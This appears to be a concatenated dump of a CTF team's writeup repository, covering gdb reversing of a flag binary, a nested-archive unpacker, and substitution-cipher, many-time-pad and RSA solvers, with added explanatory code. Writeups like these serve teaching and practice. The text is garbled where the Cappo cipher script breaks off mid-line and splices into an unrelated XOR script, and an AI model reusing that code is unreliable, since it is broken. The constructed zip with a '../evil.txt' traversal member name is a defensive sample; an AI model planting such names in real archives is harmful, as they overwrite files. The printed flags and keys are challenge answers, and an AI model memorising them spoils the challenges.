106 | 0x00000000004007a4 <+78>: test eax,eax
107 | 0x00000000004007a6 <+80>: je 0x4007af
108 | 0x00000000004007a8 <+82>: mov eax,0x1
109 | 0x00000000004007ad <+87>: jmp 0x4007b4
110 | 0x00000000004007af <+89>: mov eax,0xffffffff
111 | 0x00000000004007b4 <+94>: add eax,ecx
112 | 0x00000000004007b6 <+96>: mov ecx,eax
113 | 0x00000000004007b8 <+98>: movsxd rax,edx
114 | 0x00000000004007bb <+101>: mov BYTE PTR [rax+0x6010e0],cl
115 | 0x00000000004007c1 <+107>: add DWORD PTR [rbp-0x40],0x1
116 | 0x00000000004007c5 <+111>: jmp 0x400775
117 | 0x00000000004007c7 <+113>: movabs rax,0x616c662f706d742f
118 | 0x00000000004007d1 <+123>: mov QWORD PTR [rbp-0x30],rax
119 | 0x00000000004007d5 <+127>: mov DWORD PTR [rbp-0x28],0x78742e67
120 | 0x00000000004007dc <+134>: mov WORD PTR [rbp-0x24],0x74
121 | 0x00000000004007e2 <+140>: lea rax,[rbp-0x30]
122 | 0x00000000004007e6 <+144>: mov esi,0x400974
123 | 0x00000000004007eb <+149>: mov rdi,rax
124 | 0x00000000004007ee <+152>: call 0x400650
125 | 0x00000000004007f3 <+157>: mov QWORD PTR [rbp-0x38],rax
126 | 0x00000000004007f7 <+161>: mov rax,QWORD PTR [rbp-0x38]
127 | 0x00000000004007fb <+165>: mov edx,0x601120
128 | ---Type to continue, or q to quit---
129 | 0x0000000000400800 <+170>: mov esi,0x400976
130 | 0x0000000000400805 <+175>: mov rdi,rax
131 | 0x0000000000400808 <+178>: mov eax,0x0
132 | 0x000000000040080d <+183>: call 0x400620
133 | 0x0000000000400812 <+188>: mov DWORD PTR [rbp-0x3c],0x0
134 | 0x0000000000400819 <+195>: mov eax,DWORD PTR [rbp-0x3c]
135 | 0x000000000040081c <+198>: movsxd rbx,eax
136 | 0x000000000040081f <+201>: mov edi,0x6010e0
137 | 0x0000000000400824 <+206>: call 0x4005e0
138 | 0x0000000000400829 <+211>: cmp rbx,rax
139 | 0x000000000040082c <+214>: jae 0x4008b5
140 | 0x0000000000400832 <+220>: mov eax,DWORD PTR [rbp-0x3c]
141 | 0x0000000000400835 <+223>: cdqe
142 | 0x0000000000400837 <+225>: mov eax,DWORD PTR [rax*4+0x601160]
143 | 0x000000000040083e <+232>: movsxd rcx,eax
144 | 0x0000000000400841 <+235>: mov rax,QWORD PTR [rbp-0x38]
145 | 0x0000000000400845 <+239>: mov edx,0x0
146 | 0x000000000040084a <+244>: mov rsi,rcx
147 | 0x000000000040084d <+247>: mov rdi,rax
148 | 0x0000000000400850 <+250>: call 0x400640
149 | 0x0000000000400855 <+255>: mov eax,DWORD PTR [rbp-0x3c]
150 | 0x0000000000400858 <+258>: cdqe
151 | 0x000000000040085a <+260>: mov eax,DWORD PTR [rax*4+0x601160]
152 | 0x0000000000400861 <+267>: cdqe
153 | 0x0000000000400863 <+269>: movzx eax,BYTE PTR [rax+0x6010e0]
154 | 0x000000000040086a <+276>: movsx eax,al
155 | 0x000000000040086d <+279>: mov rdx,QWORD PTR [rbp-0x38]
156 | 0x0000000000400871 <+283>: mov rsi,rdx
157 | 0x0000000000400874 <+286>: mov edi,eax
158 | 0x0000000000400876 <+288>: call 0x400600
159 | 0x000000000040087b <+293>: mov rax,QWORD PTR [rbp-0x38]
160 | 0x000000000040087f <+297>: mov edx,0x0
161 | 0x0000000000400884 <+302>: mov esi,0x0
162 | 0x0000000000400889 <+307>: mov rdi,rax
163 | 0x000000000040088c <+310>: call 0x400640
164 | 0x0000000000400891 <+315>: mov rax,QWORD PTR [rbp-0x38]
165 | 0x0000000000400895 <+319>: mov edx,0x601120
166 | 0x000000000040089a <+324>: mov esi,0x400976
167 | 0x000000000040089f <+329>: mov rdi,rax
168 | 0x00000000004008a2 <+332>: mov eax,0x0
169 | 0x00000000004008a7 <+337>: call 0x400620
170 | 0x00000000004008ac <+342>: add DWORD PTR [rbp-0x3c],0x1
171 | 0x00000000004008b0 <+346>: jmp 0x400819
172 | 0x00000000004008b5 <+351>: mov rax,QWORD PTR [rbp-0x38]
173 | 0x00000000004008b9 <+355>: mov rdi,rax
174 | ---Type to continue, or q to quit---
175 | 0x00000000004008bc <+358>: call 0x4005d0
176 | 0x00000000004008c1 <+363>: lea rax,[rbp-0x30]
177 | 0x00000000004008c5 <+367>: mov rdi,rax
178 | 0x00000000004008c8 <+370>: call 0x4005c0
179 | 0x00000000004008cd <+375>: mov eax,0x0
180 | 0x00000000004008d2 <+380>: mov rbx,QWORD PTR [rbp-0x18]
181 | 0x00000000004008d6 <+384>: xor rbx,QWORD PTR fs:0x28
182 | 0x00000000004008df <+393>: je 0x4008e6
183 | 0x00000000004008e1 <+395>: call 0x4005f0 <__stack_chk_fail@plt>
184 | 0x00000000004008e6 <+400>: add rsp,0x38
185 | 0x00000000004008ea <+404>: pop rbx
186 | 0x00000000004008eb <+405>: pop rbp
187 | 0x00000000004008ec <+406>: ret
188 | End of assembler dump.
189 | (gdb)
190 | ```
191 |
192 | Here we need to set a breakpoint right before the remove call, so we can take a look at the output file.
193 | ```
194 | 0x00000000004008bc <+358>: call 0x4005d0
195 | ```
196 |
197 | Let's set the breakpoint and run
198 | ```
199 | (gdb) break *0x00000000004008bc
200 | Breakpoint 1 at 0x4008bc
201 | (gdb) run
202 | Starting program: /tmp/getit
203 |
204 | Breakpoint 1, 0x00000000004008bc in main ()
205 | (gdb)
206 | ```
207 |
208 | Now we can check the flag.txt written to the /tmp directory
209 | ```bash
210 | cat /tmp/flag.txt
211 | *********{*********************************
212 | ```
213 |
214 | Back in the ltrace output we have a strlen call right after the fprintf
215 | ```bash
216 | fopen("/tmp/flag.txt", "w") = 0x8f8010
217 | fprintf(0x8f8010, "%s\n", "********************************"...) = 44
218 | strlen("SharifCTF{b70c59275fcfa8aebf2d59"...) = 43
219 | ```
220 |
221 |
222 | So the output file does not have the correct flag value; let's go back to gdb. Quit the current session and open another one.
223 | ```bash
224 | gdb -q
225 | (gdb) file getit
226 | Reading symbols from getit...(no debugging symbols found)...done.
227 | (gdb) set disassembly-flavor intel
228 | (gdb) disassemble main
229 | [...]
230 | 0x00000000004007ee <+152>: call 0x400650
231 | 0x00000000004007f3 <+157>: mov QWORD PTR [rbp-0x38],rax
232 | 0x00000000004007f7 <+161>: mov rax,QWORD PTR [rbp-0x38]
233 | 0x00000000004007fb <+165>: mov edx,0x601120
234 | ---Type to continue, or q to quit---
235 | 0x0000000000400800 <+170>: mov esi,0x400976
236 | 0x0000000000400805 <+175>: mov rdi,rax
237 | 0x0000000000400808 <+178>: mov eax,0x0
238 | 0x000000000040080d <+183>: call 0x400620
239 | 0x0000000000400812 <+188>: mov DWORD PTR [rbp-0x3c],0x0
240 | 0x0000000000400819 <+195>: mov eax,DWORD PTR [rbp-0x3c]
241 | 0x000000000040081c <+198>: movsxd rbx,eax
242 | 0x000000000040081f <+201>: mov edi,0x6010e0
243 | 0x0000000000400824 <+206>: call 0x4005e0
244 | ```
245 |
246 | As we can see here, edi is loaded with 0x6010e0 right before the strlen call. Let's inspect that address: set a breakpoint on the strlen call and check the value at 0x6010e0
247 | ```bash
248 | (gdb) break *0x0000000000400824
249 | Breakpoint 1 at 0x400824
250 | (gdb) run
251 | Starting program: /tmp/getit
252 |
253 | Breakpoint 1, 0x0000000000400824 in main ()
254 | ```
255 |
256 | Now let's check the value at 0x6010e0
257 | ```bash
258 | (gdb) x/s 0x6010e0
259 | 0x6010e0 : "SharifCTF{b70c59275fcfa8aebf2d5911223c6589}"
260 | ```
261 |
262 | The flag is: SharifCTF{b70c59275fcfa8aebf2d5911223c6589}
263 |
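What the breakpoint reads out can also be explained from the disassembly alone. The loop between `<+24>` and `<+111>` walks the hex string at 0x6010a0 and, for each index `i`, stores `src[i] + 1` (odd `i`) or `src[i] - 1` (even `i`) at offset `i + 10` of the buffer at 0x6010e0 (`lea edx,[rax+0xa]` picks the destination index, `and eax,0x1` / `je` choose the +1 or -1). Here is that transform re-implemented in Python as an added example, not the binary's own code; the two strings are the ones from the `strings` output above, and the 10-byte skip assumes the buffer at 0x6010e0 begins with `SharifCTF{`, which is what the `SharifCTF{???...}` string in the binary shows.

```python
"""Re-implementation of the flag-building loop at main+24..+111 of getit (added example)."""
# Both strings come from the `strings` output above; the addresses are from the disassembly.
HEX_AT_6010A0 = "c61b68366edeb7bdce3c6820314b7498"        # source bytes at 0x6010a0
TEMPLATE_AT_6010E0 = "SharifCTF{" + "?" * 32 + "}"      # destination buffer at 0x6010e0


def rebuild_flag(src=HEX_AT_6010A0, template=TEMPLATE_AT_6010E0):
    """dst[i + 10] = src[i] + (1 if i is odd else -1) for i in range(strlen(src))."""
    dst = bytearray(template, "ascii")
    for i, ch in enumerate(src.encode("ascii")):
        delta = 1 if i & 1 else -1          # 'and eax,0x1' selects +1 or 0xffffffff (-1)
        dst[i + 10] = (ch + delta) & 0xFF   # 'mov BYTE PTR [rax+0x6010e0],cl' stores a single byte
    return dst.decode("ascii")


if __name__ == "__main__":
    print(rebuild_flag())
```

Nothing in this loop touches the file system: the flag is complete in memory before `fopen` is ever called, which is why a breakpoint on the first `strlen` of 0x6010e0 shows it, while the file on disk only ever receives the masked copy that `remove` deletes afterwards.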
--------------------------------------------------------------------------------
/2016/sharifctf/rev-50/getit:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/sharifctf/rev-50/getit
--------------------------------------------------------------------------------
/2016/tarfull/arq.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pogTeam/writeups/cd97b42a95d0c24fa51843f31c842579395ae7cb/2016/tarfull/arq.zip
--------------------------------------------------------------------------------
/2016/tarfull/solve.py:
--------------------------------------------------------------------------------
1 | # This solution uses recursion and IS NOT optimized. For better results, go for dynamic programming and use memoization. Or even better, just do the iterative stuff.
2 | import zipfile
3 | import tarfile
4 | import magic
5 | import os
6 | import sys
7 | 
8 | def checkType( local ):
9 |     if os.path.isdir(local):
10 |         return "dir"
11 |     else:
12 |         return magic.from_file(local, mime=True) # gets the MIME type from libmagic (solves files without explicit extension)
13 | 
14 | def extrai( local ):
15 |     tipo = checkType(local)
16 |     if "text" in tipo:
17 |         with open(local) as f:
18 |             print(f.readlines())
19 |         return
20 |     elif tipo=="dir":
21 |         return
22 |     elif "gzip" in tipo or "bzip2" in tipo:
23 |         z = tarfile.open(local)
24 |         nameList = z.getnames()
25 |     elif "zip" in tipo:
26 |         f = open(local, "rb")
27 |         z = zipfile.ZipFile(f)
28 |         nameList = z.namelist()
29 |     else: return # anything else is not an archive we know how to unpack
30 |     z.close()
31 | 
32 |     for name in nameList:
33 |         if tipo == "dir":
34 |             continue
35 |         elif name == "solve.py/": # dirty workaround for when the extracted file has the same name as the script
36 |             os.rename("solve.py", "bananas.py")
37 |             f = open(local, "rb")
38 |             z = zipfile.ZipFile(f)
39 |             z.extract(name, "")
40 |             z.close()
41 |             extrai(name)
42 |         elif "gzip" in tipo or "bzip2" in tipo:
43 |             print("[DEBUG >>>] New tar file: " + name)
44 |             z = tarfile.open(local)
45 |             z.extract(name, "")
46 |             z.close()
47 |             extrai(name)
48 |         elif "zip" in tipo:
49 |             print("[DEBUG >>>] New zip file: " + name)
50 |             f = open(local, "rb")
51 |             z = zipfile.ZipFile(f)
52 |             z.extract(name, "")
53 |             z.close()
54 |             extrai(name)
55 | 
56 | ### ATTENTION: RADIOACTIVE CODE! USE WITH CAUTION ###
57 | sys.setrecursionlimit(3000) # dirty workaround for recursion depth limit
58 | print("[DEBUG >>>] Function zip")
59 | extrai("arq.zip")
60 | 
61 | # let's put things back in place :)
62 | os.rename("solve.py/", "rep.py")
63 | os.rename("bananas.py", "solve.py")
64 |
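The solve script above unpacks whatever it finds, recursing once per layer and raising the interpreter's recursion limit to get through the chain. As an added example (not the repository's script), here is the same unwrapping done with an explicit stack and the three checks a practitioner wants before running such a thing on an untrusted archive: a nesting-depth cap, a total-size cap against decompression bombs, and a member-name check against path traversal (zip slip). Archives are identified by magic bytes, as the original does with libmagic, but with the standard library only; the nested sample is constructed in `build_sample`.

```python
"""Nested-archive unwrapper with depth, size and path-traversal checks (added example)."""
import bz2
import gzip
import io
import posixpath
import tarfile
import zipfile

MAX_DEPTH = 100          # cap nesting explicitly instead of raising the recursion limit
MAX_TOTAL = 50_000_000   # total decompressed bytes across all layers (decompression-bomb guard)


def sniff(data):
    """Identify the container by magic bytes instead of trusting the file name."""
    if data[:4] in (b"PK\x03\x04", b"PK\x05\x06"):
        return "zip"
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if data[:3] == b"BZh":
        return "bzip2"
    if len(data) >= 262 and data[257:262] == b"ustar":
        return "tar"
    return "other"


def check_member_name(name):
    """Reject names that would escape the extraction directory if ever written to disk."""
    parts = posixpath.normpath(name).split("/")
    if posixpath.isabs(name) or "\\" in name or ".." in parts:
        raise ValueError(f"unsafe member name: {name!r}")


def members(data, kind):
    """Yield (name, payload) for every regular file inside one archive layer."""
    if kind == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for info in z.infolist():
                if not info.is_dir():
                    check_member_name(info.filename)
                    yield info.filename, z.read(info)
        return
    try:
        # "r:*" lets tarfile detect plain, gzip-compressed or bzip2-compressed tar streams
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as t:
            for m in t.getmembers():
                if m.isfile():
                    check_member_name(m.name)
                    yield m.name, t.extractfile(m).read()
        return
    except tarfile.ReadError:
        if kind == "tar":
            raise
    # A bare gzip/bzip2 stream with no tar inside: a single nameless payload
    decomp = gzip.decompress if kind == "gzip" else bz2.decompress
    yield f"<{kind}>", decomp(data)


def unwrap(blob, max_depth=MAX_DEPTH, max_total=MAX_TOTAL):
    """Return {name: bytes} of the innermost non-archive payloads."""
    leaves, total = {}, 0
    stack = [("<root>", blob, 0)]
    while stack:
        name, data, depth = stack.pop()
        kind = sniff(data)
        if kind == "other":
            leaves[name] = data
            continue
        if depth >= max_depth:
            raise ValueError(f"archive nesting exceeds {max_depth} at {name!r}")
        for child_name, payload in members(data, kind):
            total += len(payload)
            if total > max_total:
                raise ValueError("decompressed size exceeds limit; possible decompression bomb")
            stack.append((child_name, payload, depth + 1))
    return leaves


def build_sample():
    """Constructed sample: flag.txt inside a zip, inside a tar.gz, inside a zip."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("flag.txt", b"CTF{constructed-sample}\n")
    tgz = io.BytesIO()
    with tarfile.open(fileobj=tgz, mode="w:gz") as t:
        info = tarfile.TarInfo("level2.zip")
        info.size = len(inner.getvalue())
        t.addfile(info, io.BytesIO(inner.getvalue()))
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("level1.tar.gz", tgz.getvalue())
    return outer.getvalue()


def build_traversal_sample():
    """Constructed sample: a zip whose member name tries to climb out of the target directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("../evil.txt", b"x")
    return buf.getvalue()


if __name__ == "__main__":
    print(unwrap(build_sample()))
```

Working in memory keeps the unwrapper itself from ever writing a bad path, but `check_member_name` is still applied, because the payloads are normally written out afterwards under the same names.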
--------------------------------------------------------------------------------
/2017/3DSCTF/cappo/README.md:
--------------------------------------------------------------------------------
1 | # Cappo di Tutti Cappo - 500 pts
2 |
3 | ~~~
4 | Help the FBI
5 |
6 | Server: capoditutticapi01.3dsctf.org
7 |
8 | Port: 8001
9 | ~~~
10 |
11 | Connecting with `nc`:
12 |
13 | ~~~
14 | +++ 3DSCTF - Capo Di Tutti Capi +++
15 |
16 | [+] One year after the death of the one of the most famous members of the
17 | mafia, the FBI found a notebook with a few weird annotations.
18 |
19 | [+] Trying to use the same strategy as the last time, all the FBI experts
20 | failed to translate the book. Look if you have some luck!
21 |
22 | [+] Type start to read the first note: start
23 | Openning the book...
24 |
25 | [+] Page 1/10 [c, r, p]: [ZNEKWSGQXYRMVUDHPBTILFCOJA, 5, SRJYC S ZUQJICK, OVSCLYT KIAC HTURY]
26 | The answer is:
27 | ~~~
28 |
29 | Every round the challenge gave us 3 different elements in the same format:
30 |
31 | 'NEHQAOBYXUGDZMPSKFRIJVWLCT', 2, 'VUB QBJV CHN VK BSVBI KWI QWJGSBJJ GJ VK QB QKIS GSVK GV'
32 |
33 | The first element (`NEHQAOBYXUGDZMPSKFRIJVWLCT`) is always a 26 chars string, a strong indicator of a substitution alphabet. The second element (`2`) is always a number between 1 and 26, which seems like an offset. It could be related to a rotation, like in a Caesar Cipher. The last element is probably the encrypted message itself.
34 |
35 | With this information in mind we confirmed that both a substitution and a rotation were indeed involved. To decrypt, we first substituted the message back according to the alphabet, and then applied a rotation according to the offset.
36 |
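The two-step decryption for one page, as an added example that is not the team's script (the `pwn` networking part is left out): undo the substitution by mapping the i-th symbol of the round's alphabet back to the i-th letter of A-Z, then shift every letter back by the offset. The sample alphabet, offset and message are the ones quoted above; the plaintext is what this code produces from them.

```python
"""Decrypt one Capo di Tutti Capi page: undo the substitution, then the rotation (added example)."""
import string

# Sample round quoted above: alphabet, offset, message.
ALPHABET = "NEHQAOBYXUGDZMPSKFRIJVWLCT"
OFFSET = 2
MESSAGE = "VUB QBJV CHN VK BSVBI KWI QWJGSBJJ GJ VK QB QKIS GSVK GV"


def unsubstitute(msg, alphabet):
    """Map the i-th symbol of `alphabet` back to the i-th letter of A-Z; keep spaces and punctuation."""
    if sorted(alphabet) != list(string.ascii_uppercase):
        raise ValueError("substitution alphabet must be a permutation of A-Z")
    return msg.translate(str.maketrans(alphabet, string.ascii_uppercase))


def unrotate(msg, offset):
    """Caesar shift every letter back by `offset`, leaving other characters alone."""
    out = []
    for c in msg:
        if c in string.ascii_uppercase:
            out.append(chr((ord(c) - ord("A") - offset) % 26 + ord("A")))
        else:
            out.append(c)
    return "".join(out)


def decrypt_page(alphabet, offset, msg):
    return unrotate(unsubstitute(msg, alphabet), offset)


if __name__ == "__main__":
    print(decrypt_page(ALPHABET, OFFSET, MESSAGE))
```

The order matters: the server substituted after rotating, so decryption has to unsubstitute first; applying the two steps the other way round on the sample gives letters, but not a sentence.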
37 | The code below gave us what we needed:
38 |
39 | ~~~
40 | import string
41 | from pwn import *
42 |
43 | def substitute(msg, alphabet):
44 |     subs = {}
45 |     for x,y in zip(alphabet, string.ascii_uppercase):
46 |         subs[x] = y
47 | 
48 |     subs[' '] = ' '
49 |     subs[','] = ','
50 |     subs['.'] = '.'
51 | 
52 |     res = ''
53 |     for c in msg:
54 |         res += subs[c]
55 | 
56 |     return res
57 | 
58 | def rotate(msg, offset):
59 |     res = ''
60 |     for c in msg:
61 |         if c == ' ':
62 |             res += ' '
63 |             continue
64 |         elif c==',':
65 |             res+=','
66 |             continue
67 |         elif c=='.':
68 |             res+='.'
69 |             continue
70 | elif ord(c)-ord('A')= 7: knownSpaceIndexes.append(ind)
51 | #print knownSpaceIndexes # Shows all the positions where we now know the key!
52 |
53 | # Now Xor the current_index with spaces, and at the knownSpaceIndexes positions we get the key back!
54 | xor_with_spaces = strxor(ciphertext.decode('hex'),' '*1000)
55 | for index in knownSpaceIndexes:
56 |     # Store the key's value at the correct position
57 |     final_key[index] = xor_with_spaces[index].encode('hex')
58 |     # Record that we know the key at this position
59 |     known_key_positions.add(index)
60 |
61 | # Construct a hex key from the currently known key, adding in '00' hex chars where we do not know (to make a complete hex string)
62 | final_key_hex = ''.join([val if val is not None else '00' for val in final_key])
63 | # Xor the currently known key with the target cipher
64 | output = strxor(target_cipher.decode('hex'),final_key_hex.decode('hex'))
65 | # Print the output, printing a * if that character is not known yet
66 | print 'FLAG:'
67 | print ''.join([char if index in known_key_positions else '*' for index, char in enumerate(output)])
68 |
69 | '''
70 | Manual step
71 | '''
72 | # From the output this prints, we can manually complete the target plaintext from:
73 | # The secuet-mes*age*is: Wh** usi|g **str*am cipher, nev***use th* k*y *ore than onc*
74 | # to:
75 | # The secret message is: When using a stream cipher, never use the key more than once
76 |
77 | # We then confirm this is correct by producing the key from this, and decrpyting all the other messages to ensure they make grammatical sense
78 | target_plaintext = "ncryption scheme always." #???
79 | print target_plaintext
80 | key = strxor(target_cipher.decode('hex'),target_plaintext)
81 | print(key)
82 | for cipher in ciphers:
83 |     print strxor(cipher.decode('hex'),key)
84 |
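The space-voting trick the comments above describe, as an added self-contained example with constructed data (not the challenge's ciphertexts or this script): XORing two ciphertexts cancels the shared key, a space XOR a letter is again a letter, and letter XOR letter never is, so a column that turns into letters against most other messages marks a space, and the key byte there is the ciphertext byte XOR 0x20. The constructed key and the five short plaintexts are only there to make the effect checkable; the technique itself is why a stream-cipher key must never be reused.

```python
"""Many-time pad: recovering key bytes from ciphertexts that reuse one key (added example)."""

# Constructed demo: five 12-byte messages, all XORed with the SAME 12-byte key.
KEY = bytes.fromhex("0f1e2d3c4b5a69788796a5b4")
PLAINTEXTS = [b"the big cats", b"four cups ok", b"no knife set", b"seven hearts", b"jumped quick"]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


CIPHERTEXTS = [xor(p, KEY) for p in PLAINTEXTS]


def is_ascii_letter(v):
    return 0x41 <= v <= 0x5A or 0x61 <= v <= 0x7A


def space_positions(target, ciphers, threshold=None):
    """Indexes where ciphers[target] almost certainly encrypts a space.
    c_t ^ c_j == p_t ^ p_j (the key cancels). A space XOR a letter is that letter with its
    case flipped; letter XOR letter is never a letter (0x00-0x1f same case, 0x20-0x3f mixed),
    so a position that yields letters against most other messages holds a space in p_t."""
    others = [c for i, c in enumerate(ciphers) if i != target]
    if threshold is None:
        threshold = len(others) // 2 + 1      # a majority of the other messages
    found = []
    for pos in range(len(ciphers[target])):
        votes = sum(1 for c in others
                    if pos < len(c) and is_ascii_letter(ciphers[target][pos] ^ c[pos]))
        if votes >= threshold:
            found.append(pos)
    return found


def recover_key(ciphers):
    """Merge the space positions of every message into a partial key {index: key_byte}."""
    key = {}
    for t, c in enumerate(ciphers):
        for pos in space_positions(t, ciphers):
            key[pos] = c[pos] ^ 0x20          # ciphertext byte XOR the known plaintext byte ' '
    return key


def partial_decrypt(cipher, key):
    """Plaintext with '*' wherever the key byte is still unknown, like the FLAG print above."""
    return "".join(chr(b ^ key[i]) if i in key else "*" for i, b in enumerate(cipher))


def crib_key(cipher, guessed_plaintext):
    """The manual step: once one message is fully guessed, its ciphertext yields the whole key."""
    return xor(cipher, guessed_plaintext)


if __name__ == "__main__":
    partial = recover_key(CIPHERTEXTS)
    for c in CIPHERTEXTS:
        print(partial_decrypt(c, partial))
    full = crib_key(CIPHERTEXTS[0], b"the big cats")
    print([xor(c, full) for c in CIPHERTEXTS])
```

With only five messages the majority threshold recovers 8 of the 12 key bytes; the remaining positions are exactly the ones where no message has a space, which is why the original script finishes with a manual crib of one complete sentence.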
--------------------------------------------------------------------------------
/2017/AlexCTF/cr3/README.md:
--------------------------------------------------------------------------------
1 | ~~~~
2 | p=0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
3 |
4 | q=0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
5 |
6 | e=0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
7 |
8 | c=0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520
9 | ~~~~
10 |
11 | The chall gave us some parameters (p, q, e, c), from which we inferred this is an RSA chall. The whole point is how to code the decryption algorithm.
12 |
13 | Wikipedia's RSA page is very illustrative. In order to decrypt all we need to do is:
14 |
15 | m = c^d mod n
16 |
17 | Where
18 |
19 | phi(n) = (p-1)*(q-1)
20 | e*d = 1 (mod phi(n))
21 |
22 | The difficult part was to compute *d*. For some reason (???) we could not find a trivial python3 module for computing numerical stuff. After checking the code recipe at Wikibooks we got the flag.
23 |
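The decryption above with nothing but the standard library, as an added example (not the writeup's cr3.py): since Python 3.8, `pow(e, -1, phi)` computes the modular inverse directly, so the extended-Euclid helper is not needed. The values of p, q, e and c are the challenge parameters quoted above; the block also shows the CRT form of the decryption that real implementations use, which gives the same m from the two factors.

```python
"""RSA private exponent and decryption with the standard library only (added example)."""
# Challenge parameters quoted in the writeup above.
p = 0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
q = 0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
e = 0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
c = 0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520
n = p * q
phi = (p - 1) * (q - 1)


def private_exponent(e, phi):
    """d = e^-1 mod phi(n). pow() with exponent -1 (Python 3.8+) raises ValueError when
    gcd(e, phi) != 1, which is the same condition the writeup's modinv() checks."""
    return pow(e, -1, phi)


def decrypt(c, d, n):
    return pow(c, d, n)                       # m = c^d mod n


def decrypt_crt(c, d, p, q):
    """Same m as decrypt(), computed mod p and mod q separately and recombined (Garner);
    this is how implementations that hold the factors actually decrypt, and it is faster."""
    dp, dq = d % (p - 1), d % (q - 1)
    q_inv = pow(q, -1, p)
    m1, m2 = pow(c, dp, p), pow(c, dq, q)
    h = (q_inv * (m1 - m2)) % p
    return m2 + h * q


def int_to_bytes(m):
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    d = private_exponent(e, phi)
    print(int_to_bytes(decrypt_crt(c, d, p, q)))
```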
--------------------------------------------------------------------------------
/2017/AlexCTF/cr3/cr3.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3.5
2 |
3 | from Crypto.PublicKey import RSA
4 | import binascii
5 |
6 | p=0xa6055ec186de51800ddd6fcbf0192384ff42d707a55f57af4fcfb0d1dc7bd97055e8275cd4b78ec63c5d592f567c66393a061324aa2e6a8d8fc2a910cbee1ed9
7 |
8 | q=0xfa0f9463ea0a93b929c099320d31c277e0b0dbc65b189ed76124f5a1218f5d91fd0102a4c8de11f28be5e4d0ae91ab319f4537e97ed74bc663e972a4a9119307
9 |
10 | n = p*q
11 |
12 | e=0x6d1fdab4ce3217b3fc32c9ed480a31d067fd57d93a9ab52b472dc393ab7852fbcb11abbebfd6aaae8032db1316dc22d3f7c3d631e24df13ef23d3b381a1c3e04abcc745d402ee3a031ac2718fae63b240837b4f657f29ca4702da9af22a3a019d68904a969ddb01bcf941df70af042f4fae5cbeb9c2151b324f387e525094c41
13 |
14 | c=0x7fe1a4f743675d1987d25d38111fae0f78bbea6852cba5beda47db76d119a3efe24cb04b9449f53becd43b0b46e269826a983f832abb53b7a7e24a43ad15378344ed5c20f51e268186d24c76050c1e73647523bd5f91d9b6ad3e86bbf9126588b1dee21e6997372e36c3e74284734748891829665086e0dc523ed23c386bb520
15 |
16 | def egcd(a, b):
17 |     if a == 0:
18 |         return (b, 0, 1)
19 |     else:
20 |         g, y, x = egcd(b % a, a)
21 |         return (g, x - (b // a) * y, y)
22 | 
23 | def modinv(a, m):
24 |     g, x, y = egcd(a, m)
25 |     if g != 1:
26 |         raise Exception('modular inverse does not exist')
27 |     else:
28 |         return x % m
29 |
30 | d = modinv(e, (p-1)*(q-1))
31 | key = RSA.construct((n, e, d, p, q))
32 | pt = hex(key.decrypt(c))
33 |
34 | print(binascii.unhexlify(pt[2:]))
35 |
36 |
--------------------------------------------------------------------------------
/2017/AlexCTF/cr4/README.md:
--------------------------------------------------------------------------------
1 | The idea this time is to crack RSA built with small prime numbers. We first needed to find the public modulus *n* and then factorize it, since:
2 |
3 | n = p*q
4 |
5 | Our code to do it:
6 |
7 | ~~~~
8 | from Crypto.PublicKey import RSA
9 | import gmpy
10 | import base64
11 | import binascii
12 |
13 | with open('key.pub','r') as key:
14 | pub = RSA.importKey(key.read())
15 |
16 | n = int(pub.n)
17 |
18 | print(n)
19 | ~~~~
20 |
21 | [FactorDB](http://factordb.com/) is the best place I know to do it, and we got the results for *p* and *q* very quickly:
22 |
23 | ~~~~
24 | # Using factordb
25 | p = 863653476616376575308866344984576466644942572246900013156919
26 | q = 965445304326998194798282228842484732438457170595999523426901
27 | ~~~~
28 |
29 | Now we can rebuild the private key. Instead of doing the same thing we did with CR3, I tried to explore *gmpy* module:
30 |
31 | ~~~~
32 | # We could also use the same algorithm we did with cr3
33 | d = int(gmpy.invert(e,(p-1)*(q-1)))
34 | print(d)
